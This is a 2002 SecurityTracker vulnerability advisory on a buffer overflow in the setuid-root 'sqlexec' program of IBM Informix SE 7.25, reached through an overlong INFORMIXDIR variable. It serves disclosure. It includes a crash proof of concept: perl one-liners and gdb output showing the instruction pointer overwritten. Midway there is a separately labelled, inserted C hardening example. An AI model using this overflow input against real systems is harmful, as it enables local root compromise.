Category:   Application (Database)  >   Informix Vendors:   IBM
IBM Informix SE Database Buffer Overflow in Processing the 'INFORMIXDIR' Environment Variable May Allow Local Users to Obtain Root Privileges
SecurityTracker Alert ID:  1004420
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 30 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): Informix SE-7.25
Description:   A vulnerability was reported in IBM's Informix Standard Engine (SE). A local user may be able to obtain root-level privileges in certain situations.

It is reported that a local user can trigger a buffer overflow in the processing of the INFORMIXDIR environment variable by setting the variable to a value longer than 2023 bytes.

According to the report, the 'sqlexec' program is configured with set user id (suid) root privileges and set group id (sgid) 'informix' group privileges.

A demonstration exploit transcript is provided:

[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'`
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault

This overflow allows a local user to overwrite the EIP register and cause arbitrary code to be executed on the system with root level privileges.

The local user must, of course, have execute privileges for the /lib/sqlexec program.
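As an added example, not part of the advisory and not IBM's code, the following C shows how a privileged program should handle the pattern the advisory describes: a reconstructed INFORMIXDIR loader that ignores the environment entirely when running with s-bits in effect and otherwise length-checks the value before copying, so the 2023/2024-byte boundary reported above becomes an explicit refusal rather than a stack overwrite. The buffer size, default path and function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical reconstruction, not IBM's code: 2024 bytes of INFORMIXDIR crash
 * sqlexec while 2023 do not, the classic symptom of strcpy()ing getenv() output
 * into a fixed stack buffer. Buffer size and default path are assumptions. */
#define INFORMIXDIR_BUFSZ   2024            /* room for 2023 chars plus NUL */
#define INFORMIXDIR_DEFAULT "/opt/informix" /* placeholder compiled-in default */

/* Returns 0 and fills `out`, or -1 to refuse. A setuid/setgid program must not
 * trust the invoking user's environment, so `privileged` forces the compiled-in
 * default; otherwise the value is measured with a bound before any copy and an
 * overlong value is refused rather than silently truncated. */
int hardened_load_informixdir(const char *value, int privileged,
                              char *out, size_t outsz) {
    if (out == NULL || outsz == 0) return -1;
    if (privileged || value == NULL || value[0] == '\0')
        value = INFORMIXDIR_DEFAULT;
    size_t n = 0;
    while (n < outsz && value[n] != '\0')   /* bounded scan, never past outsz */
        n++;
    if (n >= outsz) return -1;              /* would not fit with its NUL */
    memcpy(out, value, n + 1);
    return 0;
}

/* Test helper: feed a constructed run of `len` 'A' bytes, as the advisory's
 * perl one-liner produces, and return the loader's verdict. */
int hardened_verdict_for_len(size_t len, int privileged) {
    char dir[INFORMIXDIR_BUFSZ], *value = malloc(len + 1);
    if (value == NULL) return -2;
    memset(value, 'A', len);
    value[len] = '\0';
    int rc = hardened_load_informixdir(value, privileged, dir, sizeof dir);
    free(value);
    return rc;
}

int main(void) {
    char dir[INFORMIXDIR_BUFSZ];
    int priv = geteuid() != getuid() || getegid() != getgid(); /* s-bits active */
    if (hardened_load_informixdir(getenv("INFORMIXDIR"), priv, dir, sizeof dir)) {
        fputs("INFORMIXDIR rejected, refusing to start\n", stderr);
        return 1;
    }
    printf("using INFORMIXDIR=%s\n", dir);
    return 0;
}
```

Run unprivileged with the advisory's two `export INFORMIXDIR=...` lines to see the 2023-byte value accepted and the 2024-byte value rejected instead of faulting.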

The vendor has reportedly been notified. [Editor's note: Although IBM has apparently been notified, it appears that there may be a lack of sufficient internal communications within IBM and the part of IBM responsible for Informix may not have been notified.]

Impact:   A local user may be able to execute arbitrary code with root level privileges to gain root access on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Boundary error
Underlying OS:  Linux (Any)

Message History:   None.

 Source Message Contents

Subject:  Informix SE-7.25 /lib/sqlexec Vulnerability


 Title:    Local Vulnerability in Informix SE-7.25
 Date:     21-04-2002
 Platform: Only tested in Linux but can be exported to others.
 Impact:   Users with exec perm over /lib/sqlexec can obtain euid=0 
 Author:   Juan Manuel Pascual Escriba <>
 Status:   Vendor contacted details below.


    Buffer overflow exists if INFORMIXDIR environment variable is defined
with a size greater than 2023 bytes

[pask@dimoni lib]$ ls -FAlsc
total 2588
   4 drwxrwxr-x    2 informix informix     4096 May 28 22:50 boom/
1484 -rwsr-sr-x    1 root     informix  1515480 Apr 20 22:09 sqlexec*
 504 -rwxr-xr-x    1 informix informix   510283 Apr 20 22:09 sqlexecd*
 596 -rwxr-xr-x    1 informix informix   606041 Apr 20 22:09 sqlrm*

[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'` 
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault

[pask@dimoni lib]$ gdb ./sqlexec
(gdb) r
Starting program: /home/informix/SE-7.25/lib/./sqlexec
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers
esp            0x3fffed08       0x3fffed08
ebp            0x41414141       0x41414141
esi            0x3fffedf9       1073737209
edi            0x8191571        135861617
eip            0x41414141       0x41414141

    Users with exec perm over /lib/sqlexec can obtain euid=0 
in a standard installation of Informix SE-7.25

    Will be available when IBM develops a patch.

    On 21st April I tried to contact IBM through, and I received a quick answer
telling me that I could email to
report this vulnerability. This email address doesn't exist
or is misconfigured (I received the message returned).

   On 28th May I tried to contact IBM through, and they answered the email telling me
"to call to Main support Line and choose option 3 to speak
customer service representative who will be happy to assist"

I'm sorry, but I'm not happy to pay an international call bill,
and I'm not a customer.

   The status of this advisory can be checked at:

--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba  

-- 

		   "In god We Trust, Others We monitor"

			Juan Manuel Pascual Escriba
		     Midnight Systems & Security Manager


